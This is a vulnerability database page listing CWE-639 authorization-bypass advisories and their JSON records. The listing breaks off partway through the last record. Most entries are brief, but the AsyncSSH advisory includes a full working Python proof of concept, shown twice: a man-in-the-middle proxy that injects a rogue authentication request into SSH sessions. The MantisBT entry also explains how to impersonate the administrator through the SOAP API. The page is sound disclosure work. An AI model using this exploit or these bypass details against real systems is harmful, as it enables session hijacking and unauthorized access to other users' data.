CWE-639
AllowedAuthorization Bypass Through User-Controlled Key
Abstraction: Base · Status: Incomplete
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
3255 vulnerabilities reference this CWE, most recent first.
GHSA-C29H-3PP8-76HF
Vulnerability from github – Published: 2026-02-20 18:31 – Updated: 2026-02-25 21:31Authorization Bypass Through User-Controlled Key vulnerability in Shiprocket Shiprocket shiprocket allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shiprocket: from n/a through <= 2.0.8.
{
"affected": [],
"aliases": [
"CVE-2025-68051"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-20T16:22:09Z",
"severity": "HIGH"
},
"details": "Authorization Bypass Through User-Controlled Key vulnerability in Shiprocket Shiprocket shiprocket allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shiprocket: from n/a through \u003c= 2.0.8.",
"id": "GHSA-c29h-3pp8-76hf",
"modified": "2026-02-25T21:31:17Z",
"published": "2026-02-20T18:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68051"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/shiprocket/vulnerability/wordpress-shiprocket-plugin-2-0-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-C2PW-6VG9-W3RM
Vulnerability from github – Published: 2026-07-13 12:35 – Updated: 2026-07-13 12:35Authorization Bypass Through User-Controlled Key vulnerability in Cozmoslabs User Profile Picture metronet-profile-picture allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects User Profile Picture: from n/a through <= 2.6.3.
{
"affected": [],
"aliases": [
"CVE-2026-61971"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-13T10:16:47Z",
"severity": "LOW"
},
"details": "Authorization Bypass Through User-Controlled Key vulnerability in Cozmoslabs User Profile Picture metronet-profile-picture allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects User Profile Picture: from n/a through \u003c= 2.6.3.",
"id": "GHSA-c2pw-6vg9-w3rm",
"modified": "2026-07-13T12:35:06Z",
"published": "2026-07-13T12:35:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-61971"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/metronet-profile-picture/vulnerability/wordpress-user-profile-picture-plugin-2-6-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C2VP-9842-2XQ2
Vulnerability from github – Published: 2024-01-11 06:30 – Updated: 2026-04-08 21:32The Contact Form 7 – Dynamic Text Extension plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the CF7_get_custom_field and CF7_get_current_user shortcodes due to missing validation on a user controlled key. This makes it possible for authenticated attackers with contributor access or higher to access arbitrary metadata of any post type, referencing the post by id and the meta by key.
{
"affected": [],
"aliases": [
"CVE-2023-6630"
],
"database_specific": {
"cwe_ids": [
"CWE-359",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-11T05:15:09Z",
"severity": "MODERATE"
},
"details": "The Contact Form 7 \u2013 Dynamic Text Extension plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the CF7_get_custom_field and CF7_get_current_user shortcodes due to missing validation on a user controlled key. This makes it possible for authenticated attackers with contributor access or higher to access arbitrary metadata of any post type, referencing the post by id and the meta by key.",
"id": "GHSA-c2vp-9842-2xq2",
"modified": "2026-04-08T21:32:09Z",
"published": "2024-01-11T06:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6630"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3019572%40contact-form-7-dynamic-text-extension%2Ftrunk\u0026old=2968460%40contact-form-7-dynamic-text-extension%2Ftrunk\u0026sfp_email=\u0026sfph_mail=#file4"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3f1d836-da32-414f-9f2b-d485c44b2486?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C2WC-64F2-WXPP
Vulnerability from github – Published: 2025-06-10 12:30 – Updated: 2025-10-22 15:31An Insecure Direct Object Reference (IDOR) vulnerability has been found in DM Corporative CMS. This vulnerability allows an attacker to access the private area setting the option parameter equal to 0, 1 or 2 in /administer/selectionnode/framesSelection.asp.
{
"affected": [],
"aliases": [
"CVE-2025-40658"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-10T10:15:28Z",
"severity": "MODERATE"
},
"details": "An Insecure Direct Object Reference (IDOR) vulnerability has been found in DM Corporative CMS. This vulnerability allows an attacker to access the private area setting the\u00a0option parameter equal to 0, 1 or 2 in /administer/selectionnode/framesSelection.asp.",
"id": "GHSA-c2wc-64f2-wxpp",
"modified": "2025-10-22T15:31:04Z",
"published": "2025-06-10T12:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40658"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dm-corporative-cms-dmacroweb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-C2XG-QJQW-2V98
Vulnerability from github – Published: 2026-07-15 16:45 – Updated: 2026-07-15 16:45MantisBT 2.28.3 and earlier contains a critical authentication bypass in the SOAP API's mci_check_login() function. Any user knowing any valid cookie_string can authenticate as any other user (knowing their username), including the administrator, without knowing the target's password.
The vulnerability is exploitable with zero prior access on default MantisBT installations because self-registration is enabled by default ($g_allow_signup = ON). A self-registered user can use their own cookie_string (readable from their browser's MANTIS_STRING_COOKIE cookie after login) to impersonate the administrator via the SOAP API.
The REST API is NOT affected. The REST API's AuthMiddleware derives the username server-side from the API token or session cookie, so the username cannot be spoofed.
The Web UI is NOT affected. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the MANTIS_STRING_COOKIE against the logged-in user through auth_is_cookie_valid(). The username is derived server-side from the cookie, not supplied by the client.
Impact
- Full administrator access to the SOAP API from zero prior access (with self-registration enabled, which is the default)
- Read/write all issues including private issues and notes across all projects
- Full data exfiltration of all bug reports, attachments, user accounts (id, name, email), and non-private configuration values via the 71 SOAP operations available
- Destructive operations: delete projects, issues, attachments, tags, categories, and versions
- Data manipulation: create/modify issues, impersonate reporters, manage project structure
- Chains with other vulnerabilities: the SOAP admin access enables exploitation of SOAP vulnerabilities that require administrator privileges
Patches
- https://github.com/mantisbt/mantisbt/commit/e3571c319b1721b41b0dc4b5b5203cbdcbe0c2ee
Workarounds
None
Resources
- https://mantisbt.org/bugs/view.php?id=37121
Credits
MantisBT would like to thank McCaulay Hudson (@_McCaulay) of watchTowr for originally identifying and responsibly reporting the issue.
The vulnerability was subsequently discovered by other researchers, while the team was working on fixing and preparing the release. MantisBT credits them here, in chronological order of their reports: - Keitaro Yamazaki (@tyage) - Harrison Keating (@voraci0us) - Chandler Johnson (@chndlrx) - Bharat Devasani (@bharatdevasani)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.28.3"
},
"package": {
"ecosystem": "Packagist",
"name": "mantisbt/mantisbt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.28.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47156"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-15T16:45:22Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "MantisBT 2.28.3 and earlier contains a critical authentication bypass in the SOAP API\u0027s mci_check_login() function. Any user knowing any valid cookie_string can authenticate as any other user (knowing their username), including the administrator, without knowing the target\u0027s password.\n\nThe vulnerability is exploitable with zero prior access on default MantisBT installations because self-registration is enabled by default ($g_allow_signup = ON). A self-registered user can use their own cookie_string (readable from their browser\u0027s MANTIS_STRING_COOKIE cookie after login) to impersonate the administrator via the SOAP API.\n\nThe REST API is NOT affected. The REST API\u0027s AuthMiddleware derives the username server-side from the API token or session cookie, so the username cannot be spoofed.\n\nThe Web UI is NOT affected. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the MANTIS_STRING_COOKIE against the logged-in user through auth_is_cookie_valid(). The username is derived server-side from the cookie, not supplied by the client.\n\n### Impact\n- Full administrator access to the SOAP API from zero prior access (with self-registration enabled, which is the default)\n- Read/write all issues including private issues and notes across all projects\n- Full data exfiltration of all bug reports, attachments, user accounts (id, name, email), and non-private configuration values via the 71 SOAP operations available\n- Destructive operations: delete projects, issues, attachments, tags, categories, and versions\n- Data manipulation: create/modify issues, impersonate reporters, manage project structure\n- Chains with other vulnerabilities: the SOAP admin access enables exploitation of SOAP vulnerabilities that require administrator privileges\n\n### Patches\n- https://github.com/mantisbt/mantisbt/commit/e3571c319b1721b41b0dc4b5b5203cbdcbe0c2ee\n\n### Workarounds\nNone\n\n### Resources\n- https://mantisbt.org/bugs/view.php?id=37121\n\n### Credits\nMantisBT would like to thank McCaulay Hudson ([@_McCaulay](https://x.com/_mccaulay)) of [watchTowr](https://labs.watchtowr.com/) for originally identifying and responsibly reporting the issue.\n\nThe vulnerability was subsequently discovered by other researchers, while the team was working on fixing and preparing the release. MantisBT credits them here, in chronological order of their reports: \n- Keitaro Yamazaki (@tyage) \n- Harrison Keating (@voraci0us)\n- Chandler Johnson (@chndlrx)\n- Bharat Devasani (@bharatdevasani)",
"id": "GHSA-c2xg-qjqw-2v98",
"modified": "2026-07-15T16:45:22Z",
"published": "2026-07-15T16:45:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-c2xg-qjqw-2v98"
},
{
"type": "WEB",
"url": "https://github.com/mantisbt/mantisbt/commit/e3571c319b1721b41b0dc4b5b5203cbdcbe0c2ee"
},
{
"type": "PACKAGE",
"url": "https://github.com/mantisbt/mantisbt"
},
{
"type": "WEB",
"url": "https://mantisbt.org/bugs/view.php?id=37121"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "MantisBT: SOAP API Authentication Bypass with Privilege Escalation to Administrator"
}
GHSA-C2XH-VR49-PCP6
Vulnerability from github – Published: 2024-06-14 12:30 – Updated: 2026-04-08 18:33The LatePoint Plugin plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'start_or_use_session_for_customer' function in all versions up to and including 4.9.9. This makes it possible for unauthenticated attackers to view other customer's cabinets, including the ability to view PII such as email addresses and to change their LatePoint user password, which may or may not be associated with a WordPress account.
{
"affected": [],
"aliases": [
"CVE-2024-2472"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-14T10:15:09Z",
"severity": "CRITICAL"
},
"details": "The LatePoint Plugin plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the \u0027start_or_use_session_for_customer\u0027 function in all versions up to and including 4.9.9. This makes it possible for unauthenticated attackers to view other customer\u0027s cabinets, including the ability to view PII such as email addresses and to change their LatePoint user password, which may or may not be associated with a WordPress account.",
"id": "GHSA-c2xh-vr49-pcp6",
"modified": "2026-04-08T18:33:25Z",
"published": "2024-06-14T12:30:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2472"
},
{
"type": "WEB",
"url": "https://aramhairchitects.nl"
},
{
"type": "WEB",
"url": "https://websec.nl/blog/critical-idor-vulnerability-in-latepoint-plugin-exposes-sensitive-data-666b78446e63d6dcdb0f73bf"
},
{
"type": "WEB",
"url": "https://wpdocs.latepoint.com/changelog"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6215fa9f-06bc-4dc8-b1f5-a3bb75749f1d?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C33V-23RX-7QQC
Vulnerability from github – Published: 2022-05-24 16:52 – Updated: 2024-02-12 11:44An insecure direct object reference (IDOR) vulnerability exists in the RSS feeds of Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2. This can lead to unauthorized access to order details.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "magento/community-edition"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "magento/community-edition"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "magento/community-edition"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-7864"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-17T20:54:19Z",
"nvd_published_at": "2019-08-02T22:15:00Z",
"severity": "MODERATE"
},
"details": "An insecure direct object reference (IDOR) vulnerability exists in the RSS feeds of Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2. This can lead to unauthorized access to order details.",
"id": "GHSA-c33v-23rx-7qqc",
"modified": "2024-02-12T11:44:03Z",
"published": "2022-05-24T16:52:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7864"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7864.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/magento/magento2"
},
{
"type": "WEB",
"url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-33"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20220121011306/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-33"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Magento 2 Community Edition IDOR Vulnerability"
}
GHSA-C35Q-FFPF-5QPM
Vulnerability from github – Published: 2023-11-09 18:35 – Updated: 2025-11-04 16:47Summary
An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.
Details
The rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.
The attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.
PoC
AsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example) ```python #!/usr/bin/python3 import socket from threading import Thread from binascii import unhexlify from time import sleep ################################################################################## ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ## ## ## ## Variant: Unmodified variant (EXT_INFO by client required) ## ## ## ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ## ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ## ## ## ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ## ################################################################################## # IP and port for the TCP proxy to bind to PROXY_IP = '127.0.0.1' PROXY_PORT = 2222 # IP and port of the server SERVER_IP = '127.0.0.1' SERVER_PORT = 22 # Length of the individual messages NEW_KEYS_LENGTH = 16 CLIENT_EXT_INFO_LENGTH = 60 # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO) ADDITIONAL_CLIENT_DATA_LENGTH = 60 newkeys_payload = b'\x00\x00\x00\x0c\x0a\x15' def contains_newkeys(data): return newkeys_payload in data rogue_userauth_request = unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000') def insert_rogue_authentication_request(data): newkeys_index = data.index(newkeys_payload) # Insert rogue authentication request and remove SSH_MSG_EXT_INFO return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:] def forward_client_to_server(client_socket, server_socket): delay_next = False try: while True: client_data = client_socket.recv(4096) if delay_next: delay_next = False sleep(0.25) if contains_newkeys(client_data): print("[+] SSH_MSG_NEWKEYS sent by client identified!") if len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH: print("[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!") while len(client_data) < NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH: client_data += client_socket.recv(4096) print(f"[d] Original client_data before modification: {client_data.hex()}") client_data = insert_rogue_authentication_request(client_data) print(f"[d] Modified client_data with rogue authentication request: {client_data.hex()}") delay_next = True if len(client_data) == 0: break server_socket.send(client_data) except ConnectionResetError: print("[!] Client connection has been reset. Continue closing sockets.") print("[!] forward_client_to_server thread ran out of data, closing sockets!") client_socket.close() server_socket.close() def forward_server_to_client(client_socket, server_socket): try: while True: server_data = server_socket.recv(4096) if len(server_data) == 0: break client_socket.send(server_data) except ConnectionResetError: print("[!] Target connection has been reset. Continue closing sockets.") print("[!] forward_server_to_client thread ran out of data, closing sockets!") client_socket.close() server_socket.close() if __name__ == '__main__': print("--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---") mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.bind((PROXY_IP, PROXY_PORT)) mitm_socket.listen(5) print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...") try: while True: client_socket, client_addr = mitm_socket.accept() print(f"[+] Accepted connection from: {client_addr}") print(f"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.") server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((SERVER_IP, SERVER_PORT)) print("[+] Spawning new forwarding threads to handle client connection.") Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start() Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start() except KeyboardInterrupt: client_socket.close() server_socket.close() mitm_socket.close() ```Impact
The impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "asyncssh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.14.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46446"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-349",
"CWE-354",
"CWE-359",
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2023-11-09T18:35:14Z",
"nvd_published_at": "2023-11-14T03:15:09Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAn issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.\n\n### Details\n\nThe rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker\u0027s account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user\u0027s session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker\u0027s position to a MitM at the application layer and enabling perfect shell emulation.\n\nThe attacks work by the attacker injecting a chosen authentication request before the client\u0027s NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.\n\n### PoC\n\n\u003cdetails\u003e\n \u003csummary\u003eAsyncSSH 2.14.0 client (simple_client.py example) connecting to AsyncSSH 2.14.0 server (simple_server.py example)\u003c/summary\u003e\n\n ```python\n #!/usr/bin/python3\n import socket\n from threading import Thread\n from binascii import unhexlify\n from time import sleep\n \n ##################################################################################\n ## Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ##\n ## ##\n ## Variant: Unmodified variant (EXT_INFO by client required) ##\n ## ##\n ## Client(s) tested: AsyncSSH 2.14.0 (simple_client.py example) ##\n ## Server(s) tested: AsyncSSH 2.14.0 (simple_server.py example) ##\n ## ##\n ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n ##################################################################################\n \n # IP and port for the TCP proxy to bind to\n PROXY_IP = \u0027127.0.0.1\u0027\n PROXY_PORT = 2222\n \n # IP and port of the server\n SERVER_IP = \u0027127.0.0.1\u0027\n SERVER_PORT = 22\n \n # Length of the individual messages\n NEW_KEYS_LENGTH = 16\n CLIENT_EXT_INFO_LENGTH = 60\n # Additional data sent by the client after NEW_KEYS (excluding EXT_INFO)\n ADDITIONAL_CLIENT_DATA_LENGTH = 60\n \n newkeys_payload = b\u0027\\x00\\x00\\x00\\x0c\\x0a\\x15\u0027\n def contains_newkeys(data):\n return newkeys_payload in data\n \n rogue_userauth_request = unhexlify(\u0027000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000\u0027)\n def insert_rogue_authentication_request(data):\n newkeys_index = data.index(newkeys_payload)\n # Insert rogue authentication request and remove SSH_MSG_EXT_INFO\n return data[:newkeys_index] + rogue_userauth_request + data[newkeys_index:newkeys_index + NEW_KEYS_LENGTH] + data[newkeys_index + NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH:]\n \n def forward_client_to_server(client_socket, server_socket):\n delay_next = False\n try:\n while True:\n client_data = client_socket.recv(4096)\n if delay_next:\n delay_next = False\n sleep(0.25)\n if contains_newkeys(client_data):\n print(\"[+] SSH_MSG_NEWKEYS sent by client identified!\")\n if len(client_data) \u003c NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n print(\"[+] client_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!\")\n while len(client_data) \u003c NEW_KEYS_LENGTH + CLIENT_EXT_INFO_LENGTH + ADDITIONAL_CLIENT_DATA_LENGTH:\n client_data += client_socket.recv(4096)\n print(f\"[d] Original client_data before modification: {client_data.hex()}\")\n client_data = insert_rogue_authentication_request(client_data)\n print(f\"[d] Modified client_data with rogue authentication request: {client_data.hex()}\")\n delay_next = True\n if len(client_data) == 0:\n break\n server_socket.send(client_data)\n except ConnectionResetError:\n print(\"[!] Client connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_client_to_server thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n def forward_server_to_client(client_socket, server_socket):\n try:\n while True:\n server_data = server_socket.recv(4096)\n if len(server_data) == 0:\n break\n client_socket.send(server_data)\n except ConnectionResetError:\n print(\"[!] Target connection has been reset. Continue closing sockets.\")\n print(\"[!] forward_server_to_client thread ran out of data, closing sockets!\")\n client_socket.close()\n server_socket.close()\n \n if __name__ == \u0027__main__\u0027:\n print(\"--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---\")\n mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mitm_socket.bind((PROXY_IP, PROXY_PORT))\n mitm_socket.listen(5)\n \n print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n \n try:\n while True:\n client_socket, client_addr = mitm_socket.accept()\n print(f\"[+] Accepted connection from: {client_addr}\")\n print(f\"[+] Establishing new server connection to {(SERVER_IP, SERVER_PORT)}.\")\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"[+] Spawning new forwarding threads to handle client connection.\")\n Thread(target=forward_client_to_server, args=(client_socket, server_socket)).start()\n Thread(target=forward_server_to_client, args=(client_socket, server_socket)).start()\n except KeyboardInterrupt:\n client_socket.close()\n server_socket.close()\n mitm_socket.close()\n ```\n\u003c/details\u003e\n\n### Impact\n\nThe impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection\u0027s security.",
"id": "GHSA-c35q-ffpf-5qpm",
"modified": "2025-11-04T16:47:15Z",
"published": "2023-11-09T18:35:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/security/advisories/GHSA-c35q-ffpf-5qpm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46446"
},
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/commit/83e43f5ea3470a8617fc388c72b062c7136efd7e"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-c35q-ffpf-5qpm"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/asyncssh/PYSEC-2023-239.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/ronf/asyncssh"
},
{
"type": "WEB",
"url": "https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00042.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ME34ROZWMDK5KLMZKTSA422XVJZ7IMTE"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20231222-0001"
},
{
"type": "WEB",
"url": "https://www.terrapin-attack.com"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AsyncSSH Rogue Session Attack"
}
GHSA-C3JV-HPF4-4RPW
Vulnerability from github – Published: 2023-12-20 00:32 – Updated: 2023-12-20 00:32EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities.
{
"affected": [],
"aliases": [
"CVE-2023-6929"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-19T23:15:08Z",
"severity": "HIGH"
},
